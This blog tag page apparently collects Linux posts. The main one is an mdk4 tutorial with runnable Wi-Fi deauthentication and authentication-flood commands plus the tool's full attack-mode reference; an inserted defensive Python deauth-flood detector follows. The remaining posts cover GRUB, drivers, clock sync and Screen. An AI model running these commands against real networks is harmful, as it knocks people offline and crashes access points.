10 posts tagged "Linux"

Mdk4 Wireless Attacks

· 10 min read

This content is for learning and testing only; I abide by the law.

Mdk3 is no longer maintained and cannot attack Wi-Fi on the 5 GHz band, while Mdk4 adds 5 GHz support, so naturally the newer tool is the one to use. In practice, Wi-Fi networks using WPA3 appear immune to deauth and flooding attacks; this held across repeated attempts. Wi-Fi networks using WPA2 or older protocols can be attacked easily and with noticeable effect.

Installation

Install aircrack-ng and mdk4; on Manjaro both can be installed with the following command

yay -S aircrack-ng mdk4

Usage

Enable monitor mode

sudo airmon-ng start wlp8s0

This creates wlp8s0mon as the monitor interface; every attack command below uses the monitor interface.

Scan wireless networks

Scan Wi-Fi on the 2.4 GHz band

sudo airodump-ng wlp8s0mon

Scan Wi-Fi on the 5 GHz band. The parameter a denotes the 802.11a standard on 5 GHz; it can also be bg, which stands for 802.11b and 802.11g, both of which operate on the 2.4 GHz band.

sudo airodump-ng --band a wlp8s0mon 

Common scenarios

Deauthentication attack: disconnect every client of the wireless network on channel 11.

sudo mdk4 wlp8s0mon d -c 11

Authentication attack against the access point with BSSID AE:15:5d:ad:40:9b, making it crash and reboot

sudo mdk4 wlp8s0mon a -a AE:15:5d:ad:40:9b
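On the defending side, the flood that mode d produces shows up in a monitor-mode capture as a burst of 802.11 management frames of subtype 12 (deauthentication) or 10 (disassociation) at a single BSSID, whereas a station leaving normally sends one such frame. The following is an added example, not code from the post or from mdk4: it parses the 26-byte deauth/disassoc frame and counts frames per BSSID in a sliding time window; the MAC addresses, the one-second window and the threshold of 10 are constructed, assumed values.

```python
import struct
from collections import defaultdict

MGMT = 0                      # 802.11 frame type 0 = management
DISASSOC, DEAUTH = 0xA, 0xC   # management subtypes a deauth/disassoc flood consists of
BROADCAST = 'ff:ff:ff:ff:ff:ff'
AP1, AP2, STA = 'aa:bb:cc:dd:ee:01', 'aa:bb:cc:dd:ee:02', '02:00:00:00:00:10'  # constructed MACs


def build_mgmt_frame(subtype, dst, src, bssid, seq, reason=7):
    """Build a minimal deauth/disassoc frame: 24-byte header + 2-byte reason code, no FCS."""
    fc = bytes([(subtype << 4) | (MGMT << 2), 0x00])            # frame control, flags cleared
    addrs = b''.join(bytes.fromhex(m.replace(':', '')) for m in (dst, src, bssid))
    seq_ctrl = struct.pack('<H', (seq & 0xFFF) << 4)            # fragment 0, 12-bit sequence number
    return fc + b'\x00\x00' + addrs + seq_ctrl + struct.pack('<H', reason)


def parse_mgmt_frame(frame):
    """Return (subtype, dst, src, bssid, seq, reason), or None if not a deauth/disassoc frame."""
    if len(frame) < 26 or (frame[0] >> 2) & 0x3 != MGMT or frame[0] >> 4 not in (DEAUTH, DISASSOC):
        return None
    dst, src, bssid = (frame[i:i + 6].hex(':') for i in (4, 10, 16))
    seq_ctrl, reason = struct.unpack_from('<HH', frame, 22)
    return frame[0] >> 4, dst, src, bssid, seq_ctrl >> 4, reason


def detect_flood(capture, window=1.0, threshold=10):
    """Map BSSID -> peak deauth/disassoc count for BSSIDs exceeding `threshold` within `window` seconds."""
    times_by_bssid = defaultdict(list)
    for ts, frame in capture:                    # capture: iterable of (timestamp, raw 802.11 frame)
        parsed = parse_mgmt_frame(frame)
        if parsed:
            times_by_bssid[parsed[3]].append(ts)
    flagged = {}
    for bssid, times in times_by_bssid.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:      # slide the window start forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[bssid] = peak
    return flagged


def sample_capture():
    """Constructed capture: one ordinary deauth on AP2, then a 30-frame burst at AP1."""
    cap = [(0.0, build_mgmt_frame(DEAUTH, STA, AP2, AP2, seq=100, reason=3))]
    for i in range(30):
        cap.append((1.0 + i * 0.01, build_mgmt_frame(DEAUTH if i % 2 == 0 else DISASSOC, BROADCAST, AP1, AP1, seq=i)))
    return cap
```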

Attack modes

In practice only a and d get used; a beacon attack is too outrageous and too obvious.

ATTACK MODE b: Beacon Flooding
Sends beacon frames to show fake APs at clients.
This can sometimes crash network scanners and even drivers!
ATTACK MODE a: Authentication Denial-Of-Service
Sends authentication frames to all APs found in range.
Too many clients can freeze or reset several APs.
ATTACK MODE p: SSID Probing and Bruteforcing
Probes APs and checks for answer, useful for checking if SSID has been correctly decloaked and if AP is in your sending range.
Bruteforcing of hidden SSIDs with or without a wordlist is also available.
ATTACK MODE d: Deauthentication and Disassociation
Sends deauthentication and disassociation packets to stations based on data traffic to disconnect all clients from an AP.
ATTACK MODE m: Michael Countermeasures Exploitation
Sends random packets or re-injects duplicates on another QoS queue to provoke Michael Countermeasures on TKIP APs.
AP will then shutdown for a whole minute, making this an effective DoS.
ATTACK MODE e: EAPOL Start and Logoff Packet Injection
Floods an AP with EAPOL Start frames to keep it busy with fake sessions and thus disables it to handle any legitimate clients. Or logs off clients by injecting fake EAPOL Logoff messages.
ATTACK MODE s: Attacks for IEEE 802.11s mesh networks
Various attacks on link management and routing in mesh networks
Flood neighbors and routes, create black holes and divert traffic!
ATTACK MODE w: WIDS Confusion
Confuse/Abuse Intrusion Detection and Prevention Systems by cross-connecting clients to multiple WDS nodes or fake rogue APs.
ATTACK MODE f: Packet Fuzzer
A simple packet fuzzer with multiple packet sources and a nice set of modifiers. Be careful!
ATTACK MODE x: Poc Testing
Proof-of-concept of WiFi protocol implementation vulnerability, to test whether the device has wifi vulnerabilities.
It may cause the wifi connection to be disconnected or the target device to crash.

Attack parameters

mdk4 <interface> <attack_mode> [attack_options]
mdk4 <interface in> <interface out> <attack_mode> [attack_options]
ATTACK MODE b: Beacon Flooding
Sends beacon frames to generate fake APs at clients.
This can sometimes crash network scanners and drivers!
-n <ssid>
Use SSID <ssid> instead of randomly generated ones
-a
Use also non-printable caracters in generated SSIDs
and create SSIDs that break the 32-byte limit
-f <filename>
Read SSIDs from file
-v <filename>
Read MACs and SSIDs from file. See example file!
-t <adhoc>
-t 1 = Create only Ad-Hoc network
-t 0 = Create only Managed (AP) networks
without this option, both types are generated
-w <encryptions>
Select which type of encryption the fake networks shall have
Valid options: n = No Encryption, w = WEP, t = TKIP (WPA), a = AES (WPA2)
You can select multiple types, i.e. "-w wta" will only create WEP and WPA networks
-b <bitrate>
Select if 11 Mbit (b) or 54 MBit (g) networks are created
Without this option, both types will be used.
-m
Use valid accesspoint MAC from built-in OUI database
-h
Hop to channel where network is spoofed
This is more effective with some devices/drivers
But it reduces packet rate due to channel hopping.
-c <chan>
Create fake networks on channel <chan>. If you want your card to
hop on this channel, you have to set -h option, too.
-i <HEX>
Add user-defined IE(s) in hexadecimal at the end of the tagged parameters
-s <pps>
Set speed in packets per second (Default: 50)

ATTACK MODE a: Authentication Denial-Of-Service
Sends authentication frames to all APs found in range.
Too many clients can freeze or reset several APs.
-a <ap_mac>
Only test the specified AP
-m
Use valid client MAC from built-in OUI database
-i <ap_mac>
Perform intelligent test on AP
This test connects clients to the AP and reinjects sniffed data to keep them alive.
-s <pps>
Set speed in packets per second (Default: unlimited)

ATTACK MODE p: SSID Probing and Bruteforcing
Probes APs and checks for answer, useful for checking if SSID has
been correctly decloaked and if AP is in your sending range.
Bruteforcing of hidden SSIDs with or without a wordlist is also available.
-e <ssid>
SSID to probe for
-f <filename>
Read SSIDs from file for bruteforcing hidden SSIDs
-t <bssid>
Set MAC address of target AP
-s <pps>
Set speed (Default: 400)
-b <character sets>
Use full Bruteforce mode (recommended for short SSIDs only!)
You can select multiple character sets at once:
* n (Numbers: 0-9)
* u (Uppercase: A-Z)
* l (Lowercase: a-z)
* s (Symbols: ASCII)
-p <word>
Continue bruteforcing, starting at <word>.
-r <channel>
Probe request tests (mod-musket)

ATTACK MODE d: Deauthentication and Disassociation
Sends deauthentication and disassociation packets to stations
based on data traffic to disconnect all clients from an AP.
-w <filename>
Read file containing MACs not to care about (Whitelist mode)
-b <filename>
Read file containing MACs to run test on (Blacklist Mode)
-s <pps>
Set speed in packets per second (Default: unlimited)
-x
Enable full IDS stealth by matching all Sequence Numbers
Packets will only be sent with clients' addresses
-c [chan,chan,...,chan[:speed]]
Enable channel hopping. When -c h is given, mdk4 will hop an all
14 b/g channels. Channel will be changed every 3 seconds,
if speed is not specified. Speed value is in milliseconds!
-E <AP ESSID>
Specify an AP ESSID to attack.
-B <AP BSSID>
Specify an AP BSSID to attack.
-S <Station MAC address>
Specify a station MAC address to attack.
-W <Whitelist Station MAC address>
Specify a whitelist station MAC.

ATTACK MODE m: Michael Countermeasures Exploitation
Sends random packets or re-injects duplicates on another QoS queue
to provoke Michael Countermeasures on TKIP APs.
AP will then shutdown for a whole minute, making this an effective DoS.
-t <bssid>
Set target AP, that runs TKIP encryption
-j
Use the new QoS exploit which only needs to reinject a few packets instead
of the random packet injection, which is unreliable but works without QoS.
-s <pps>
Set speed in packets per second (Default: 400)
-w <seconds>
Wait <seconds> between each random packet burst (Default: 10)
-n <count>
Send <count> random packets per burst (Default: 70)

ATTACK MODE e: EAPOL Start and Logoff Packet Injection
Floods an AP with EAPOL Start frames to keep it busy with fake sessions
and thus disables it to handle any legitimate clients.
Or logs off clients by injecting fake EAPOL Logoff messages.
-t <bssid>
Set target WPA AP
-s <pps>
Set speed in packets per second (Default: 400)
-l
Use Logoff messages to kick clients

ATTACK MODE s: Attacks for IEEE 802.11s mesh networks
Various attacks on link management and routing in mesh networks.
Flood neighbors and routes, create black holes and divert traffic!
-f <type>
Basic fuzzing tests. Picks up Action and Beacon frames from the air, modifies and replays them:
The following modification types are implemented:
1: Replay identical frame until new one arrives (duplicate flooding)
2: Change Source and BSSID (possibly resulting in Neighbor Flooding)
3: Cut packet short, leave 802.11 header intact (find buffer errors)
4: Shotgun mode, randomly overwriting bytes after header (find bugs)
5: Skript-kid's automated attack trying all of the above randomly :)
-b <impersonated_meshpoint>
Create a Blackhole, using the impersonated_meshpoint's MAC address
mdk4 will answer every incoming Route Request with a perfect route over the impersonated node.
-p <impersonated_meshpoint>
Path Request Flooding using the impersonated_meshpoint's address
Adjust the speed switch (-s) for maximum profit!
-l
Just create loops on every route found by modifying Path Replies
-s <pps>
Set speed in packets per second (Default: 100)
-n <meshID>
Target this mesh network

ATTACK MODE w: WIDS Confusion
Confuse/Abuse Intrusion Detection and Prevention Systems by
cross-connecting clients to multiple WDS nodes or fake rogue APs.
Confuses a WDS with multi-authenticated clients which messes up routing tables
-e <SSID>
SSID of target WDS network
-c [chan,chan,...,chan[:speed]]
Enable channel hopping. When -c h is given, mdk4 will hop an all
14 b/g channels. Channel will be changed every 3 seconds,
if speed is not specified. Speed value is in milliseconds!
-z
activate Zero_Chaos' WIDS exploit
(authenticates clients from a WDS to foreign APs to make WIDS go nuts)
-s <pps>
Set speed in packets per second (Default: 100)

ATTACK MODE f: Packet Fuzzer
A simple packet fuzzer with multiple packet sources
and a nice set of modifiers. Be careful!
mdk4 randomly selects the given sources and one or multiple modifiers.
-s <sources>
Specify one or more of the following packet sources:
a - Sniff packets from the air
b - Create valid beacon frames with random SSIDs and properties
c - Create CTS frames to broadcast (you can also use this for a CTS DoS)
p - Create broadcast probe requests
-m <modifiers>
Select at least one of the modifiers here:
n - No modifier, do not modify packets
b - Set destination address to broadcast
m - Set source address to broadcast
s - Shotgun: randomly overwrites a couple of bytes
t - append random bytes (creates broken tagged parameters in beacons/probes)
c - Cut packets short, preferably somewhere in headers or tags
d - Insert random values in Duration and Flags fields
-c [chan,chan,...,chan[:speed]]
Enable channel hopping. When -c h is given, mdk4 will hop an all
14 b/g channels. Channel will be changed every 3 seconds,
if speed is not specified. Speed value is in milliseconds!
-p <pps>
Set speed in packets per second (Default: 250)

ATTACK MODE x: Poc Testing
Proof-of-concept of WiFi protocol implementation vulnerability,
to test whether the device has wifi vulnerabilities.
It may cause the wifi connection to be disconnected or the target device to crash.
-s <pps>
Set speed in packets per second (Default: unlimited)
-c [chan,chan,...,chan[:speed]]
Enable channel hopping. When -c h is given, mdk4 will hop an all
14 b/g channels. Channel will be changed every 3 seconds,
if speed is not specified. Speed value is in milliseconds!
-v <vendor>
file name in pocs dir, default test all.
-A <AP MAC>
set an AP MAC
-S <Station MAC>
set a station MAC.

RTL8812BU Driver Installation

· 1 min read

Someone has already packaged this in the AUR, but although the package needs linux-headers, they did not list it in the PKGBUILD, so the installation fails. You need to install this dependency manually first, then install the driver for it to succeed.

yay -S linux-headers rtl88x2bu-dkms-git

Once done, Wi-Fi networks can be found. On the lab desktop this Realtek card does not seem able to enter monitor mode; I will tinker with it on the laptop later.

GRUB Boot

· 4 min read

The most common problem is that after a Windows update the bootloader has been overwritten and the machine boots straight into Windows; in that case GRUB must be reinstalled, not merely have its boot entries updated. The second case is adding a boot entry when installing another Linux-based system, for example Chrome OS via the Brunch Framework, where you may need to disable the discrete GPU or add other kernel parameters; this also requires updating the GRUB configuration for the change to take effect.

Note:

  • Manjaro does not support Secure Boot; if it is enabled, disable it in the BIOS.
  • If the disk mode is RAID, Manjaro cannot detect the mechanical hard drive (in a dual-disk setup, 1 SSD + 1 HDD); set it to AHCI mode.
  • If Windows no longer boots after switching to AHCI mode, force a shutdown several times to enter Safe Mode, then reboot and it will start normally.
  • If the problem cannot be solved, consult the official Wiki.

Reinstall the bootloader

When the bootloader needs to be rebuilt, the command below installs GRUB to /dev/nvme0n1; make sure it is installed to the correct device.

sudo grub-install /dev/nvme0n1

Update the boot configuration

The following command applies the configuration from the previous step and takes effect after a reboot. Any change to the GRUB configuration requires update-grub, whether it is an installation or anything else.

sudo update-grub

Scenarios

1. The GRUB menu does not appear at boot

If the machine boots straight into Windows, the bootloader needs to be rebuilt:

  1. Plug in the USB stick and boot into the live system of the Manjaro installer.
  2. In a terminal run sudo manjaro-chroot -a and select the Manjaro system that will not boot. This part is confusing: to select the option numbered 0 you have to enter 1, which seems to be a bug. If there is only one system, no selection may be needed.
  3. If the previous steps went smoothly, running ls should now list the root directory of the "lost" system; check the home folder if you do not believe it. Next, rebuild the bootloader.
  4. Run sudo grub-install /dev/nvme0n1 to complete the installation.
  5. Run sudo update-grub to update the configuration and make it take effect.
  6. efibootmgr lists the boot entries in order; if manjaro appears, everything went well.
  7. Run exit to leave the chroot; after a reboot the familiar Manjaro GRUB menu is back.

2. GRUB is fine, but Windows cannot be reached

This is the case where the bootloader is confirmed to be fine, but the machine boots straight into Manjaro without ever offering a choice.

Check whether GRUB_TIMEOUT in /etc/default/grub is 0. It is the countdown in seconds during which you can choose a system, and 0 seconds obviously will not do. Next check whether GRUB_TIMEOUT_STYLE is hidden; it should be set to menu so that the menu is shown by default. Then regenerate the main configuration file and reboot to check that it works.

Clock Out of Sync with Windows

· 1 min read

Windows treats the local hardware clock as time in the configured zone (e.g. UTC+8), whereas Linux by default treats it as UTC+0. Each time Linux boots, it reads the BIOS time, adds 8 hours and displays the result as local time. Each time Windows boots, it reads the BIOS time and displays it directly as local time.

There are two approaches; pick one. I personally prefer changing the setting in Windows so that the hardware clock is interpreted as UTC.

Changing the setting on Linux

Use the following command to stop treating the hardware clock as UTC

sudo timedatectl set-local-rtc 1

Changing the setting on Windows

Reg add HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation /v RealTimeIsUniversal /t REG_DWORD /d 1

Basic Usage of GNU Screen

· 3 min read
Hanasaki

Winter break is here again, and with it the time when it is easy to forget the daily check-in. In the dorm at school someone could at least shout a reminder; at home, if I get caught up in something until the middle of the night and then crash into bed, the next day all that is left is hand-writing a self-criticism. I will absolutely not let that happen!!

Running it on GitHub Actions never went smoothly either; I do not know whether it was their servers or something else, but I kept hitting ETIMEOUT errors. Maybe their network is at peak load all day long. No matter, this freeloader has plenty of tricks~

Let's just deploy it directly on the server; surely a Tencent server will not hit network timeouts!

Installing GNU Screen

Screen, as its name suggests, is about windows; in effect it is a command-line version of the Windows Explorer, managing the creation, attaching, splitting, hiding and background running of windows.